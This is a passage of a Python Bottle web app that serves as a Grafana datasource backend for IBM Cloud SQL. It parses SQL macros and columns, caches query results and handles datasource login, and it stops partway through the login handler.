# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""WSGI-based web app
(Python 3.8 compatible)
https://stackoverflow.com/questions/32799808/python-web-application-project-structure-and-docker-support
1. able to process and store connection to Cloud SQL server [json database file]
2. able to process `table` and `time-series` request and return data
3. handle empty request string
4. handle empty returned data
5. able to handle request in concurrent -> thread-specific or coroutine-specific sqlClient object
6. able to handle NaN data and convert to empty string before returning
7. support special functions: $__timeFilter() and $__timeFilter(aiops) -
assumes the time column is a number, i.e. long type or timestamp type
8. allow caching based on `key` and sql_stmt
9. columns detection in SELECT statement:
SELECT name
SELECT fake as name
SELECT ts_explode(...) AS (name1, name2)
10. support special functions: $__source (HIVE table and COS URL)
11. add streaming time-series and multi-times series: $__source_test(TS), $__source_test(MTS)
12. can handle multiple queries at once
13. handle 'hide=True' when user don't want to run a query
14. add 'get_result' option to allow not returning any result back - good for chained queries
15. add '--time-out' option [to pass in the value (in seconds) before timeout when
the webapp is launched as a service in IBM CloudEngine for example]
16. add '--ssl' option [to run HTTPS Webserver]
17. support using $__source in CREATE TABLE statement
18. $__timeFilter(string) - now accept 'string' if the time colum is represented as a string
19. a 'time' column is now automatically converted to datetime - if it's stored in string
20. able to detect column name correctly even inside a nested SELECT statement [Feb 12, 2021]
21. able to detect and reject 'SELECT *'
22. add new macro: '$__timeFilterColumn(col-name, [type])' - user can explicitly specify
the column containing timestamp-data, and need to provide its type
(string or long/timestamp or empty) [Feb 12, 2021]
23. add iam_max_tries
24. add and use the thin-version of query-data so that the memcached no long cache the data - only tracks the job_id (just like the get_result=False scenarion) and use this to pull the data from COS
25. enhance column extraction: support the present of 'distinct' and 'all' in the select column
26. func_get_macro_mapping argument: now can be either the string or a function that returns a string
27. save data is now guaranteed to be safe from interrupt, e.g. Ctrl-C
28. job_id is now part of the saving to the state of CloudSQLDB.
29. if a query is switched from get_result=True to False, it won't be rerun, based on change in (24).
30. stop using (24) as the default - cache the whole data. The reason is that request the data from COS is still having significant delay.
31. add singletonSqlClient: apply TS-related query transformation before using that content for tracking query.
32. TooManyRowsException: add the check for number of rows limit: prevent Grafana client from waiting for transferring too large data
33. NoResultException: add the check for query without any returned data
CHANGED BEHAVIOR:
* [grafana] revise conf. setting so that $__source is optional - with tooltips to explain why user should provide
* [grafana] add $__dest to use the default one - $__dest(csv): $__dest, $__dest(), $__dest(csv)
$__dest(parquet), $__dest(arvo, a/b/c)
* add $__source_prev, $__source_prev(), $__source_prev(A), $__source_prev(B) to refer to the
data source as the output from a previous query, or a given query based on its `refId` A or B.
* avoid re-create sqlClient in a panel with multiple queries
* use status code 403, rather than 401, for error: newer Grafana 7.3.x for some reasons
maps 401 to 400 and the original message is lost
* check `should_sql_stmt_be_run` move to outside the loop --> faster for a panel
with multiple queries
(the check is not vigorous - sql is compared before any transformation done so that
adjacent spaces are also considered)
* HTTPS/SSL is added (--ssl)
code:
$__dest[( format [, suffix] )]
TODO:
* add the capability to reference to a variable - so that the dashboard can be udpated based on the
value(s) user selected for that variable
* add $__get_schema(hivetable), $__get_schema(COS://URL, format), $__get_schema($__source)
BUG fixes:
1. when metrics name is not a string
2. detect column name properly when a comment is right after it
"""
try:
# A gevent-based server is actually not asynchronous, but massively multi-threaded.
import gevent
from gevent import monkey
monkey.patch_all()
except:
print("No concurrency")
pass
import sys
from time import sleep
from bottle import Bottle, HTTPResponse, run, request, response, route, abort
from bottle import json_dumps
from calendar import timegm
from datetime import date, datetime
import math
import random
import os
import re
import regex
import numpy as np
from enum import Enum
import ibm_botocore
from IPython import embed
try:
import cPickle as pickle
except ImportError:
import pickle
from pandas.io.json import build_table_schema
import json
import sqlparse
from sqlparse.sql import IdentifierList, Identifier
from sqlparse.tokens import Keyword
import logging
import pandas as pd
import threading
from threading import Thread
from joblib import Memory
sys.path.insert(0, "../../Python/")
try:
from cloud_utilities.sql_query import SQLClient
from cloud_utilities.sql_magic import format_sql
from cloud_utilities.cos import ParsedUrl
except ImportError:
from ibmcloudsql.sql_query_ts import SQLClientTimeSeries as SQLClient
from ibmcloudsql.sql_magic import format_sql
from ibmcloudsql.cos import ParsedUrl
from ibmcloudsql.exceptions import (
CosUrlNotFoundException,
CosUrlInaccessibleException,
SqlQueryCrnInvalidFormatException,
RateLimitedException,
)
logger = logging.getLogger()
# since Python 3.3
logging.basicConfig(
# level=logging.DEBUG,
level=logging.INFO,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)s] %(message)s",
handlers=[logging.FileHandler("debug.log"), logging.StreamHandler()],
)
IAM_MAX_TRIES = 5
DEBUG = False
MAX_TRIES = 100
def get_parser():
import argparse
parser = argparse.ArgumentParser(description="Process backend webapp")
parser.add_argument(
"--time-out",
"-t",
dest="time_out",
help="the time-out of request in seconds (default: unlimited)",
)
parser.add_argument(
"--ssl", dest="ssl", action="store_true", help="run as HTTPS web server"
)
args = parser.parse_args()
return args
lock = threading.Lock()
lock_savejob = threading.Lock()
# use this to transform TS-related queryto CloudSQL-compliant form
singletonSqlClient = SQLClient()
# command-line argument
cmd_args = get_parser()
cachedir = "_cache_dir"
memory = Memory(cachedir, verbose=0)
def query_data(key, key_refId, sql_stmt, rerun=False, sqlClient=None):
"""return data + job_id"""
if cmd_args.time_out is None:
# no time-out
# df = sqlClient.run_sql(sql_stmt)
df = None
if rerun:
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=True)
df, job_id = res.data, res.job_id
else:
with lock:
sql_stmt = singletonSqlClient.human_form_to_machine_form(sql_stmt)
df, job_id = _query_data_with_result(key, sql_stmt, sqlClient)
if isinstance(df, str):
df = None
return df, job_id
else:
# with time-out
if rerun:
# not support - need to implement a mechanism in that an rerun query with timeout
# would not lead to another rerun (i.e. automatically switch off the rerun
# flag at Grafana plugin level) --> so that the next one to retrieve the data only
assert 0
else:
job_id = grafanaPluginInstances.get_job_id(key, key_refId)
if job_id is None:
job_id = sqlClient.submit_sql(sql_stmt)
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
df = None
if job_status == "completed":
df = sqlClient.get_result(job_id)
# check if job_id is present
# if so, check if job status is completed
# - if so, get the data
# if not, wait until time-out
# if time-out and still no result, send the error message back to wait a little bit and launch again
# TODO: add a time-start here
# WARNING: multi-queries lead to fail of returning job-list (429 error) --> need to consult Torsten to fix on their side
# while not sqlClient.has_available_slot():
# # TODO - add a time-window check here (subtracting time-start)
# # when it is closed to service timeout, e.g. 10min for CloudFunction or CodeEngine
# # returns the proper message asking to rerun again
# # NOTE: better if the time-out is known - as there is no way to know how the time-out is configured for now
# # e.g. on-premise there is no time-out necessary
# time.sleep(4) # seconds
# if rerun:
# # doesn't support rerun on a system with time-out
# assert(0)
# sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
# res = sqlClient.execute_sql(sql_stmt, get_result=True)
# df, job_id = res.data, res.job_id
# else:
# df, job_id = _query_data_with_result(key, sql_stmt)
# sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
# df = sqlClient.get_result(job_id)
# print("SQL URL: ", sqlClient.sql_ui_link())
return df, job_id
def query_data_noresultback(key, sql_stmt, rerun=False, sqlClient=None):
if cmd_args.time_out is None:
# no time-out
if rerun:
# doesn't support rerun on a system with time-out
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
job_id = res.job_id
else:
job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
else:
# with time-out
if rerun:
# doesn't support rerun on a system with time-out
assert cmd_args.time_out is None
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
job_id = res.job_id
else:
job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
return job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_with_result(key, sql_stmt, sqlClient=None):
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=True)
# print("SQL URL: ", sqlClient.sql_ui_link())
return res.data, res.job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_noresultback(key, sql_stmt, sqlClient=None):
"""return job_id"""
if sqlClient is None:
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
res = sqlClient.execute_sql(sql_stmt, get_result=False)
# print("SQL URL: ", sqlClient.sql_ui_link())
return res.job_id
# regex
regex_timeFilter = r"\$__timeFilter\s*\((\s*\w*\s*)\)"
p_timeFilter = re.compile(regex_timeFilter)
regex_timeFilterColumn = r"\$__timeFilterColumn\s*\((\s*\w*\s*),(\s*\w*\s*)\)"
p_timeFilterColumn = re.compile(regex_timeFilterColumn)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in = re.compile(regex_source)
regex_source = r"(?<=(?i:USING)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in_using = re.compile(regex_source)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_test(\s*\(\s*\w*\s*\))?(?=[\b|\n|\s])?"
p_cos_in_test = re.compile(regex_source)
# regex
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_prev(\s*\(\s*\w*\s*\))(?=[\b|\n|\s])?"
p_cos_in_prev = re.compile(regex_source)
# regex
regex_source = r"(?i:INTO)\s*\$__dest(\s*\([\s|\w|,|/]*\))?(?=[\b|\n|\s])?"
p_cos_out = re.compile(regex_source)
# SELECT TS_EXPLODE(...) AS (real_col1, real_col2)
regex_ts_explode = (
r"(?i)\s*(ts_explode)[\(|\w|\s|\)|\d|,]+[aA][sS]\s*\((.*)\s*,\s*(.*)\)"
)
p_ts_explode = re.compile(regex_ts_explode)
# SELECT fake_col AS real_col
regex_as_column = r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$"
p_as_column = re.compile(regex_as_column)
# SELECT real_col
regex_column = r"^\s*(\w+)\s*$"
p_column = re.compile(regex_column)
# nested SELECT statement
regex_nested_select = r"(?i)\(((?>[^\(\)]+|(?R))*)\)"
p_nested_select = regex.compile(regex_nested_select)
def gen_key(id, name):
"""generate the key for finding the right sqlClient object"""
# TODO - this may not work when the single webapp serves different Grafana instances
# --> there is a chance that the same 'id' is shared by these Grafana instances.
return str(id) + "-" + name
def gen_key_refId(dashboardId, panelId, refId):
"""generate the key for finding the right sqlClient object,
using the given (dashboard, panel, sql-id)"""
return "-".join([str(dashboardId), str(panelId), refId])
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, (datetime, date)):
return obj.isoformat()
raise TypeError("Type %s not serializable" % type(obj))
def find_column_mapping(sql_stmt, columns):
"""given the outer SELECT statement
which may contain column defined as, e.g. first(my_col) as new_col,
we want to find this mapping from 'my_col' to 'new_col'
returns
-------
dict:
"""
def get_mapping(stmt):
"""return single column or multiple columns"""
# st AS column
res = re.search(r"(?i)\s*([\w|\s]+)\(([^\)]+)\)\s*[a][s]\s+(\w+)\s*$", stmt)
if res:
return {res.group(2): res.group(3)}
else:
return {}
mapping = {}
parsed = sqlparse.parse(sql_stmt)
try:
stmt = parsed[0]
except IndexError as e:
print(sql_stmt)
print(parsed)
raise e
# assert(stmt.get_type() == "SELECT")
for token in stmt.tokens:
if isinstance(token, IdentifierList):
for identifier in token.get_identifiers():
res = get_mapping(str(identifier))
mapping.update(res)
if isinstance(token, Identifier):
res = get_mapping(str(token))
mapping.update(res)
if token.ttype is Keyword: # from
break
return mapping
def parse_sql_columns(sql):
columns = []
columns = columns + get_columns_from_single_select(sql) + parse_inner_selects(sql)
return columns
def parse_inner_selects(sql_stmt):
"""
find each inner select statement, then parse the columns from each SELECT found
"""
def find_nested_selects(stmt):
x = p_nested_select.findall(sql_stmt)
nested = []
for y in x:
y = y.strip()
if re.search(r"(?i)^select", y):
nested.append(y)
return nested
nested_selects = find_nested_selects(sql_stmt)
columns = []
for s in nested_selects:
columns = columns + parse_sql_columns(s)
return columns
def get_columns_from_single_select(sql):
"""get the list of columns in the 'SELECT' type query.
Returns an empty list, if
1. not a SELECT statement
2. SELECT * is used
History
-------
Mar, 23, 2021: can detect proper column name when comment is used, e.g.
select distinct col1 -- some comment
select distinct col1
-- some comment
"""
def get_columns(stmt):
"""return single column or multiple columns"""
# st AS column
# res = re.search(r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$", stmt)
res = p_as_column.search(stmt)
if res:
return res.group(1)
# standalone column
# res = re.search(r'^\s*(\w+)\s*$', stmt)
res = p_column.search(stmt)
if res:
return res.group(1)
res = p_ts_explode.search(stmt)
if res:
return [res.group(2), res.group(3)]
return ""
def append(columns, res):
if isinstance(res, str):
if len(res) > 0:
columns.append(res)
elif isinstance(res, list):
for i in res:
if len(i) > 0:
columns.append(i)
return columns
columns = []
parsed = sqlparse.parse(sql)
try:
stmt = parsed[0]
except IndexError as e:
print(sql)
print(parsed)
raise e
if stmt.get_type() != "SELECT":
return columns
is_present_distinct_all = False
for token in stmt.tokens:
if isinstance(token, IdentifierList):
for identifier in token.get_identifiers():
res = get_columns(str(identifier))
columns = append(columns, res)
if isinstance(token, Identifier):
lines = str(token).splitlines() # ('-- ')
pre_comment = str(token)
for line in lines:
if line.strip().startswith("--"):
pass
else:
line = line.split(" --")[0]
pre_comment = line
break
res = get_columns(pre_comment)
columns = append(columns, res)
is_present_distinct_all = False
if str(token).lower() in ["distinct", "all"]:
is_present_distinct_all = True
if token.ttype is Keyword and is_present_distinct_all is False: # from
break
return columns
class TooManyRowsException(Exception):
"""The error when the query returns too many rows"""
def __init__(self, msg, original_exception=None):
if original_exception is not None:
super().__init__(msg + (": %s" % original_exception))
else:
super().__init__(msg)
self.original_exception = original_exception
class NoResultException(Exception):
"""The error when the query returns nothing"""
def __init__(self, msg, original_exception=None):
if original_exception is not None:
super().__init__(msg + (": %s" % original_exception))
else:
super().__init__(msg)
self.original_exception = original_exception
class SourceType(Enum):
UNUSED = 1
TABLE = 2
COSURL = 3
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
def process_macro_timeFilterColumn(p_timeFilter, sql_stmt, sdt_from, sdt_to):
pattern = p_timeFilter.search(sql_stmt)
while pattern:
# the $__timeFilterColumn is used
time_col = pattern.group(1).strip().lower()
type_of_column = pattern.group(2).strip().lower()
substr = ""
# process for regular data
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
pattern = p_timeFilter.search(sql_stmt)
return sql_stmt
def process_macro_data_source(p_reg, func_get_macro_mapping, key, sql_stmt):
"""
process $__source macro
Parameters
----------
p_reg:
pattern object to detect the present of the macro
func_get_macro_mapping:
a function that translate from a key to the right data source configured
key: string
the key that is used to identify the right data source
sql_stmt: str
the SQL string
Returns
-------
the decoded SQL string
"""
patterns = p_reg.findall(sql_stmt)
try:
substr = func_get_macro_mapping(key)
except KeyError:
# TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(patterns) > 0 and len(substr) == 0:
msg = "Can't use $__source (default value has not been configured yet)"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern:
# the $__source is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
return sql_stmt
def revise_time_column(time_col, df):
"""
the dataframe may has a column representing datetime, but it may be in string format
we need to convert to the right format
target: str, "time-series" or "table"
"""
df.sort_values(by=time_col, inplace=True)
if isinstance(df[time_col][0], str) and df[time_col][0].endswith("Z"):
# remove 'Z' from datetime
# and map to string representtion
try:
tmp = [
str(x)
for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ")
]
except ValueError:
tmp = [
str(x)
for x in pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%SZ")
]
df[time_col] = tmp
# datetime64[ns] --> convert to 'ms'
# df[time_col] = pd.to_datetime(df[time_col], format="%Y-%m-%dT%H:%M:%S.%fZ").values.astype('int64') // 10**6
# .values.astype('int64') // 10**6
return df
class CloudSQLDB(dict):
def __init__(self, *arg, **kw):
super(CloudSQLDB, self).__init__(*arg, **kw)
self.db_file = "cloud_cos_db.json"
self.sqlclient_file = "sqlclient_db.pkl"
self.read()
# holding fake time-series data source
self._current_ts_df = {}
self._current_mts_df = {}
# @property
# def data(self):
# return self._content
def read(self):
_content = None
try:
with open(self.db_file, "r") as read_file:
_content = json.load(read_file)
except FileNotFoundError:
pass
if _content:
for k, v in _content.items():
self[k] = v
def save_no_interrupt(self):
a = Thread(target=self.save)
a.start()
a.join()
def save(self):
if len(self.keys()) > 0:
with open(self.db_file, "w") as write_file:
json.dump(self, write_file)
def get_sqlclient(self, key, thread_safe=False):
apiKey = self[key]["apiKey"]
instance_crn = self[key]["instance_crn"]
target_cos_url = self[key]["target_cos_url"]
if thread_safe is False:
if key in grafanaPluginInstancesSqlClient.keys():
sqlClient = grafanaPluginInstancesSqlClient[key]
print("Found SqlClient... ", sqlClient)
else:
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
else:
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
thread_safe=True,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
)
print("Create thread-safe SqlClient... ", sqlClient)
sqlClient.logon()
return sqlClient
def get_cos_source(self, key):
# stored_using_table = tmp_body.get('using_table').strip()
if self[key]["using_table"]:
table = self[key]["table"]
if len(table.strip()) == 0:
return ""
else:
return " {} ".format(table)
else:
try:
cos_in = self[key]["source_cos_url"]
except KeyError:
return ""
if len(cos_in.strip()) == 0:
return ""
else:
format_type = self[key]["format_type"]
return "{} STORED AS {}".format(cos_in, format_type)
def get_cos_source_using(self, key):
# stored_using_table = tmp_body.get('using_table').strip()
if self[key]["using_table"]:
table = self[key]["table"]
if len(table.strip()) == 0:
return ""
else:
return " {} ".format(table)
else:
try:
cos_in = self[key]["source_cos_url"]
except KeyError:
return ""
if len(cos_in.strip()) == 0:
return ""
else:
format_type = self[key]["format_type"]
return "{} LOCATION {}".format(format_type, cos_in)
def get_cos_dest(self, key, suffix, format_type):
# stored_using_table = tmp_body.get('using_table').strip()
# if self[key]['target_cos_url'][-1] == '/':
cos_out = "/".join([self[key]["target_cos_url"], suffix])
cos_out = "INTO {} STORED AS {} ".format(cos_out, format_type)
return cos_out
def get_sts_random_data(self, key, dt_from, dt_to):
values = """
FROM VALUES -- timestamp, observation
(1, 10), (2, 20), (3, 30), (4, 40),
(5, 5), (6, 10), (7, 15), (8, 40),
(9, 100), (10, 200), (11, 300), (12, 400)
AS ds
"""
# np.random.seed(2019)
N = 30
rng = pd.date_range(dt_from, dt_to, periods=N)
df = pd.DataFrame(
np.random.randint(20, size=(N, 2)),
columns=["timestamp", "observation"],
index=rng,
)
##.rename(columns={df.index.name:'timestamp'})
df = df.drop("timestamp", axis=1)
# df.reset_index(inplace=True)
# df.rename(columns={"index":"timestamp"})
# df.index = pd.to_datetime(df['index']).astype(np.int64) // 10**6
df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
if key not in self._current_ts_df:
self._current_ts_df[key] = df
else:
idx_start = (
pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
)
idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
# idx_start = df.iloc[0].name
# idx_end = df.iloc[-1].name
df = df.loc[(df.index > self._current_ts_df[key].iloc[-1].name)]
self._current_ts_df[key] = self._current_ts_df[key].append(df)
# NOTE : currently not removing old ones
# self._current_ts_df[key] = self._current_ts_df[key].loc[(self._current_ts_df[key].index >= idx_start) & (self._current_ts_df[key].index <= idx_end)]
# df = self._current_ts_df[key]
df = self._current_ts_df[key].loc[
(self._current_ts_df[key].index >= idx_start)
& (self._current_ts_df[key].index <= idx_end)
]
x = list(df.to_records(index=True))
data = ", ".join([str(i) for i in x])
assert len(data) > 0
values = """
VALUES -- timestamp, observation
{}
AS ds
""".format(
data
)
return values
def get_mts_random_data(self, key, dt_from, dt_to):
values = """
FROM VALUES -- key, timestamp, observation
(2017, 1 ,100),
(2017, 1 ,50),
(2017, 2 ,200),
(2017, 2 ,300),
(2018, 1 ,300),
(2018, 1 ,100),
(2018, 2 ,400) AS ds
"""
# np.random.seed(2019)
num_metrics = 2
df = None
for i in range(0, num_metrics + 1):
N = np.random.randint(20, 30)
rng = pd.date_range(dt_from, dt_to, periods=N)
tmp_df = pd.DataFrame(
np.hstack((np.random.randint(20, size=(N, 1)), np.array([[i] * N]).T)),
columns=["observation", "key"],
index=rng,
)
if df is None:
df = tmp_df
else:
df = df.append(tmp_df, ignore_index=False)
idx_start = pd.to_datetime(dt_from).to_datetime64().astype(np.int64) // 10 ** 6
idx_end = pd.to_datetime(dt_to).to_datetime64().astype(np.int64) // 10 ** 6
# millisecond
df.index = pd.to_datetime(df.index).astype(np.int64) // 10 ** 6
if key not in self._current_mts_df:
self._current_mts_df[key] = df
else:
df = df.loc[(df.index > self._last_mts_idx_end)]
self._current_mts_df[key] = self._current_mts_df[key].append(df)
# NOTE : currently not removing old ones
# self._current_mts_df[key] = self._current_mts_df[key].loc[(self._current_mts_df[key].index >= idx_start) & (self._current_mts_df[key].index <= idx_end)]
# df = self._current_mts_df[key]
df = self._current_mts_df[key].loc[
(self._current_mts_df[key].index >= idx_start)
& (self._current_mts_df[key].index <= idx_end)
]
x = list(df.to_records(index=True))
data = ", ".join([str(i) for i in x])
assert len(data) > 0
values = """
VALUES -- timestamp, observation, key
{}
AS ds
""".format(
data
)
self._last_mts_idx_end = idx_end
return values
def get_job_id(self, key, refId):
"""return the job_id associated with a given `key`
Return
------
str: the job_id if found; otherwise return None
"""
if "refId" not in self[key]:
with lock_savejob:
if "refId" not in self[key]:
self[key]["refId"] = {}
if refId in self[key]["refId"]:
return self[key]["refId"][refId]
else:
return None
def save_job_id(self, key, refId, job_id):
"""save the job_id for the
(query in the given dashboard/panel) ~ 'refId' and
(datasource) ~ 'key'
NOTE: The information will be used by `get_cos_source_prev`"""
if "refId" not in self[key]:
with lock_savejob:
if "refId" not in self[key]:
self[key]["refId"] = {}
self[key]["refId"][refId] = job_id
self.save_no_interrupt()
def get_cos_source_prev(self, key, refId):
"""get COS URL from the output of a previous query
Exceptions
----------
KeyError"""
sqlClient = self.get_sqlclient(key, thread_safe=True)
job_id = self[key]["refId"][refId]
job_info = sqlClient.get_job(job_id)
res = "{} STORED AS {}".format(
job_info["resultset_location"], job_info["resultset_format"]
)
return res
def should_sql_stmt_be_run(self, key, refId, sql_stmt, sleep_time):
"""return True if it is safe to launch the query, i.e. no further change to it"""
milliseconds_since_epoch = datetime.now().timestamp() * 1000
if "query" not in self[key]:
with lock:
if "query" not in self[key]:
self[key]["query"] = {}
if refId not in self[key]["query"]:
with lock:
if refId not in self[key]["query"]:
self[key]["query"][refId] = {}
if sql_stmt not in self[key]["query"][refId]:
with lock:
if sql_stmt not in self[key]["query"][refId]:
self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
elif milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
with lock:
if milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
sleep(sleep_time) # seconds
# if milliseconds_since_epoch == self[key]['query'][refId][sql_stmt]:
# # no new request to same query
# return True
if milliseconds_since_epoch < self[key]["query"][refId][sql_stmt]:
# there is a new request
return False
return True
# from cloud_utilities import test_credentials
# ref_cloud_apikey = test_credentials.apikey
# ref_instance_crn = test_credentials.instance_crn
# ref_target_cos_url = test_credentials.result_location
# store information of each datasource-plugin 'id'
grafanaPluginInstances = CloudSQLDB()
# store the object connecting to SQL Client service
grafanaPluginInstancesSqlClient = {}
# data_schema = {}
# default_sql_client = None
# aiOps = SQLClient(api_key=ref_cloud_apikey, instance_crn=ref_instance_crn, target_cos_url=ref_target_cos_url)
##aiOps = SQLClient(api_key=cloud_apikey_raghu, instance_crn=instnacecrn, target_cos_url=target_cos_url, max_concurrent_jobs=4)
# aiOps.logon()
# sqlClient = aiOps
# sqlClient.engine.sql_ui_link()
#
##dict_data = sqlClient.get_cos_summary("cos://s3.us-south.cloud-object-storage.appdomain.cloud/sql-query-cos-access-ts/jobid=a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# df = sqlClient.list_results("a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# print(df.to_string())
# with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also
# print(df)
app = Bottle()
# FUNCTIONS = {'series A': math.sin, 'series B': math.cos}
FUNCTIONS = {"series A": math.sin, "series B": "series B"}
tabular_data = {
"series A": [
{
"columns": [
{"text": "Time", "type": "time"},
{"text": "Country", "type": "string"},
{"text": "Number", "type": "number"},
],
"rows": [[1234567, "SE", 123], [1234567, "DE", 231], [1234567, "US", 321]],
"type": "table",
}
],
"series B": [
{
"columns": [
{"text": "Time", "type": "time"},
{"text": "Country", "type": "string"},
{"text": "Number", "type": "number"},
],
"rows": [[1234567, "BE", 123], [1234567, "GE", 231], [1234567, "PS", 321]],
"type": "table",
}
],
}
def convert_to_time_ms(timestamp):
"""Convert a Grafana timestamp to unixtimestamp in milliseconds
Args:
timestamp (str): the request contains ``'range': {'from':
'2019-06-16T08:00:05.331Z', 'to': '2019-06-16T14:00:05.332Z', ...``
"""
return 1000 * timegm(
datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%fZ").timetuple()
)
def create_data_points(func, start, end, length=1020):
"""
A dummy function to produce sine and cosine data
You should replace this with your SQL, CQL or Mongo Query language.
Also, make sure your database has the correct indecies to increase perfomance
Args:
func (object) - A callable that accepts a number and returns a number
start (str) - timestamp
end (str) - timestamp
length (int) - the number of data points
"""
lower = convert_to_time_ms(start)
upper = convert_to_time_ms(end)
return [
[func(i), int(i)]
for i in [lower + x * (upper - lower) / length for x in range(length)]
]
def create_data_points_name_func(series_name_or_func, start, end, length=1020):
"""Generate fake data"""
if isinstance(series_name_or_func, str):
series_name = series_name_or_func
lower = convert_to_time_ms(start)
upper = convert_to_time_ms(end)
if series_name == "series B":
return [
[random.randint(0, 100), int(i)]
for i in [lower + x * (upper - lower) / length for x in range(length)]
]
else:
func = series_name_or_func
return create_data_points(func, start, end, length=length)
@app.route("/", method="GET")
def index():
return "<h1> Hello world</h1>"
@app.route("/login", method=["POST", "GET"])
def login():
"""handle 'testDataSource() - test connection to data source
Returns
-------
str
"OK"
"""
if request.method == "GET":
return "<h1>Testing login</h1>"
logger.debug("========= PRINT REQUEST ============")
logger.debug(request)
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# apiKey = request.forms.get('apiKey')
# instance_crn = request.forms.get('instance_crn')
# result_location = request.forms.get('result_location')
# target_cos_url = request.forms.get('target_cos_url')
# instance_rate_limit = request.forms.get('instance_rate_limit')
print("Handling /login request")
id_name = "dummy_string"
key = gen_key(id_name, body.get("name"))
# always update
data_exist = False
if key in grafanaPluginInstances.keys():
tmp_body = grafanaPluginInstances[key]
stored_apiKey = tmp_body.get("apiKey").strip()
stored_instance_crn = tmp_body.get("instance_crn").strip()
stored_target_cos_url = tmp_body.get("target_cos_url").strip()
stored_source_cos_url = tmp_body.get("source_cos_url", "").strip()
stored_table = tmp_body.get("table", "").strip()
stored_using_table = tmp_body.get("using_table")
stored_instance_rate_limit = tmp_body.get("instance_rate_limit").strip()
stored_format_type = tmp_body.get("format_type", "").strip()
data_exist = True
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['instance_crn'] = body.get('instance_crn')
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['target_cos_url'] = body.get('target_cos_url')
# grafanaPluginInstances[key]['source_cos_url'] = body.get('source_cos_url')
# grafanaPluginInstances[key]['format_type'] = body.get('format_type')
# grafanaPluginInstances[key]['instance_rate_limit'] = body.get('instance_rate_limit')
# extract information
if "instance_crn" not in body or len(body["instance_crn"]) == 0:
msg = "Need CloudSQL CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
instance_crn = body.get("instance_crn").strip()
if "apiKey" not in body or len(body["apiKey"]) == 0:
msg = "Need apiKey"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
